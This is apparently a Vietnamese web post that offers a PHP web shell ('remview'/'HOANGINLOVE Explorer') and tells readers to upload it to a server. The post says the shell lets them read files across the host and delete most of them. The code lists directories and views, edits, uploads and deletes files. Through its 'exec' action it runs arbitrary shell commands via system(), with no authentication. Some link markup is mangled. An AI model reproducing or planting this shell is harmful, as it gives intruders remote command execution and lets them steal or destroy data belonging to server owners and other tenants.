View code :

trang này đã được đọc lần

Copy nội dung sau thành 1 file *.php. Up lên server, chạy file đó, bạn có thể xem code của hầu hết các file trong host, chịu khó tìm hiểu 1 chút thì có thể view code toàn server, hoạc thêm chút lệnh của unix nữa là có thể xóa del hầu hết mí file trong đó.

<?php

$default_directory = dirname($PATH_TRANSLATED);

$show_icons = 0; define("REMY_EXPLORER_VERSION", "v1.0");

define("BACKGROUND_COLOR", "\"#000000\"");

 define("FONT_COLOR", "\"#ffffff\"");

define("TABLE_BORDER_COLOR", "\"#ffffff\"");

define("TABLE_BACKGROUND_COLOR", "\"#000000\"");

 define("TABLE_FONT_COLOR", "\"#ffffff\"");

define("COLOR_PRIVATE", "\"#ffbb99\"");

define("COLOR_PUBLIC", "\"#000000\"");

define("TRUE", 1);

define("FALSE", 0);

if (!isset($dir)) $dir = $default_directory;

$dir = stripslashes($dir);

$dir = str_replace("\\", "/", $dir);

 $associations = array( "gif" => array( "function" => "viewGIF", "icon" => "icons/image2.gif" ), "jpg" => array( "function" => "viewJPEG", "icon" => "icons/image2.gif" ), "jpeg" => array( "function" => "viewJPEG", "icon" => "icons/image2.gif" ), "wav" => array( "function" => "", "icon" => "icons/sound.gif" ), "mp3" => array( "function" => "", "icon" => "icons/sound.gif" ) );

 if ($action != "view"): ?>

<html>

<head>

<title>HOANGINLOVE Explorer - remview</title>

<style type="text/css">

<!-- .body { font-family: 'Verdana'; font-size: 13; color: <? echo FONT_COLOR; ?> } table, div, tr, td

{font: 13 'Verdana'; color: <? echo TABLE_FONT_COLOR; ?> }

a {text-decoration: none; color: "#00ff00" }

 a:hover {text-decoration: underline; color: "#ff0000" }

 --> </style> </head>

<body class="body" bgcolor=<? echo BACKGROUND_COLOR; ?>> <? endif;

 function readDirectory($directory)

 { global $files, $directories, $dir;

 $files = array();

 $directories = array();

 $a = 0; $b = 0;

$dirHandler = opendir($directory);

while ($file = readdir($dirHandler))

{ if ($file != "." && $file != "..")

{ $fullName = $dir.($dir == "/" ? "" : "/").$file;

if (is_dir($fullName)) $directories[$a++] = $fullName;

 else $files[$b++] = $fullName; } }

 sort($directories); sort($files); };

function showInfoDirectory($directory)

{ global $PHP_SELF; $dirs = split("/", $directory);

 print "<b>Directory /"; for ($i = 1; $i < (sizeof($dirs));

$i++) { print "<a href=\"$PHP_SELF?dir=";

for ($a = 1; $a <= $i; $a++) echo "/$dirs[$a]"; echo "\">$dirs[$i]";

if ($directory != "/") echo "/"; } print "</b>\n";

print "Free space on disk: ";

 $freeSpace = diskfreespace($directory);

 if ($freeSpace/(1024*1024) > 1024) printf("%.2f GBytes", $freeSpace/(1024*1024*1024));

 else echo (int)($freeSpace/(1024*1024))."Mbytes\n"; };

function showDirectory($directory)

{ global $files, $directories, $fileInfo, $PHP_SELF;

readDirectory($directory);

showInfoDirectory($directory); ?>

<p><table cellpadding=3 cellspacing=1 width="100%" border="0" bgcolor=<? echo TABLE_BORDER_COLOR; ?>>

<tr bgcolor="#000000"> <? if ($show_icons): ?> <td width="16" align="center" bgcolor=<? echo TABLE_BACKGROUND_COLOR ?>>

 </td> <? endif; ?>

 <td align="center">

<b><small>NAME</small></b></td>

<td align="center"><b><small>SIZE</small></b></td>

 <td align="center"><b><small>LAST MODIF.</small></b></td>

<td align="center"><b><small>PERMISSIONS</small></b></td>

 <td align="center"><b><small>ACTIONS</small></b></td> </tr>

<? for ($i = 0; $i < sizeof($directories);

$i++) { $fileInfo->getInfo($directories[$i]);

showFileInfo($fileInfo); } for ($i = 0; $i < sizeof($files); $i++) { $fileInfo->getInfo($files[$i]);

 showFileInfo($fileInfo); } ?>

 </table>

 <? }; class fileInfo { var $name, $path, $fullname, $isDir, $lastmod, $owner, $perms, $size, $isLink, $linkTo, $extension; function permissions($mode) { $perms = ($mode & 00400) ? "r" : "-";

$perms .= ($mode & 00200) ? "w" : "-";

$perms .= ($mode & 00100) ? "x" : "-";

$perms .= ($mode & 00040) ? "r" : "-";

$perms .= ($mode & 00020) ? "w" : "-";

$perms .= ($mode & 00010) ? "x" : "-";

$perms .= ($mode & 00004) ? "r" : "-";

 $perms .= ($mode & 00002) ? "w" : "-";

$perms .= ($mode & 00001) ? "x" : "-"; return $perms; }

function getInfo($file)

{ $this->name = basename($file);

$this->path = dirname($file);

 $this->fullname = $file; $this->isDir = is_dir($file);

 $this->lastmod = date("m/d/y, H:i", filemtime($file));

$this->owner = fileowner($file);

$this->perms = $this->permissions(fileperms($file));

 $this->size = filesize($file);

$this->isLink = is_link($file);

if ($this->isLink) $this->linkTo = readlink($file);

 $buffer = explode(".", $this->fullname);

 $this->extension = $buffer[sizeof($buffer)-1]; } };

 $fileInfo = new fileInfo; function showFileInfo($fileInfo)

 { global $PHP_SELF, $associations; echo "\n<tr bgcolor=".TABLE_BACKGROUND_COLOR." align=\"center\">";

if ($show_icons) {

echo "<td>"; if ($fileInfo->isDir) echo "<img src=\"icons/dir.gif\">";

elseif ($associations[$fileInfo->extension]["icon"] != "") echo "<img src=\"".$associations[$fileInfo->extension]["icon"]."\">";

else echo "<img src=\"icons/generic.gif\">"; echo "</td>"; } echo "<td align=\"left\"";

 if ($fileInfo->perms[7] == "w") echo " bgcolor=".COLOR_PUBLIC;

if ($fileInfo->perms[6] == "-") echo " bgcolor=".COLOR_PRIVATE; echo ">";

 if ($fileInfo->isLink) { echo $fileInfo->name." -> ";

$fileInfo->fullname = $fileInfo->linkTo;

 $fileInfo->name = $fileInfo->linkTo; }

if ($fileInfo->isDir) { echo "<b>fullname\" ";

echo ">$fileInfo->name</b>"; }

 else echo $fileInfo->name;

echo "</td>";

echo "<td>$fileInfo->size</td>";

echo "<td>$fileInfo->lastmod</td>";

echo "<td>$fileInfo->perms</td>";

echo "<td>"; if (!$fileInfo->isDir) {

 if ($fileInfo->perms[6] == 'r') { echo "fullname&action=view\"> View"; }

 if ($fileInfo->perms[7] == 'w') {

 echo "fullname&action=edit\"> Edit"; echo "fullname&action=delete\"> Del"; } }

 echo "</tr>"; };

function viewFile($file)

{ global $associations, $fileInfo;

$fileInfo->getInfo($file);

if (!$associations[$fileInfo->extension] || $associations[$fileInfo->extension]["function"] == "") showFile($file);

 else $associations[$fileInfo->extension]["function"]($file); };

 function showFile($file, $editing = 0)

{ global $PHP_SELF, $dir; $handlerFile = fopen($file, "r") or die("ERROR opening file $file");

if ($editing) echo "<h3>

<b>Edit file $file</b></h3><hr>";

else echo "<h3><b>File $file</b></h3><hr>";

 echo "<form";

if ($editing) echo " action=\"$PHP_SELF?action=save&dir=$file\" method=\"post\"";

 echo ">";

 $buffer = fread($handlerFile, filesize($file));

$buffer = str_replace("&", "&", $buffer);

$buffer = str_replace("<", "<", $buffer);

$buffer = str_replace(">", ">", $buffer);

 echo "<textarea wrap=\"off\" cols=\"90\" rows=\"20\" name=\"text\">$buffer</textarea>";

if ($editing) echo "<p>

<input type=\"submit\" name=\"Submit\" value=\"Save changes\"></p>\n</form>";

echo "</form>";

fclose($handlerFile); };

 function saveFile($file)

{ global $dir, $text; $handlerFile = fopen($file, "w") or die("ERROR: Could not open file ".basename($file)." for writing");

$text = stripslashes($text);

fwrite($handlerFile, $text, strlen($text)) or die("Error writing to file.");

fclose($handlerFile);

 echo "Changes has been saved in ".basename($file)."<hr>";

 $dir = dirname($file); };

 function uploadFile()

{ global $HTTP_POST_FILES,$dir;

copy($HTTP_POST_FILES["userfile"][tmp_name], $dir."/".$HTTP_POST_FILES["userfile"][name]) or die("Error uploading file".$HTTP_POST_FILES["userfile"][name]);

 echo "File ".$HTTP_POST_FILES["userfile"][name]." succesfully uploaded.";

 //unlink($userfile); };

 function deleteFile($file)

 { global $confirm;

if ($confirm != TRUE) die("Confirm deletion of $file");

else {

if (!unlink($file)) return FALSE; return TRUE; } };

 function viewFileHeader($file, $header)

 { header($header); readfile($file); };

function viewGIF($file)

{ viewFileHeader($file, "Content-type: image/gif"); };

function viewJPEG($file)

{ viewFileHeader($file, "Content-type: image/jpeg"); };

 switch ($action) { case "phpinfo": phpinfo();

die();

case "view": viewFile($dir);

break;

case "edit": showFile($dir, 1); break;

case "download": viewFileHeader($dir, "Content-type: unknown"); break; case "delete": if (!deleteFile($dir)) echo "Could not delete file $dir

"; else echo "File $dir deleted succesfully

"; $dir = dirname($dir);

showDirectory($dir);

 break; case "exec": echo "<pre>\n";

echo system($dir);

echo "\n</pre>";

exit();

case "upload": uploadFile(); showDirectory($dir);

break;

case "save": saveFile($dir);

default: showDirectory($dir); break; };

if ($action != "view"): ?>

<p> <table border="0"> <tr><td>

<form method="get" action=<? echo "\"$PHP_SELF\""; ?>>

<input type="hidden" name="dir_from" value=<? echo "\"$dir\""; ?>> <select name="action" size="1"> <option value="jump" selected>Jump to directory</option> <option value="makedir">Create directory</option> <!-- Not implemented yet --> <option value="exec">Execute shell cmd</option> </select>

<input type="text" name="dir" size="20">

<input type="submit" value="Go"> </form> </td>

<? if ((fileperms($dir) & 00002)): ?> <td>

<form enctype="multipart/form-data" action="<? print "$PHP_SELF?dir=$dir&action=upload"; ?>" method=post> <input type="hidden" name="MAX_FILE_SIZE" value="1000000">

<input name="userfile" type="file">

<input type="submit" value="Upload file"> </form> </td>

<? endif; ?> </tr> </table> <p> <hr> </p> </body> </html> <? endif; ?>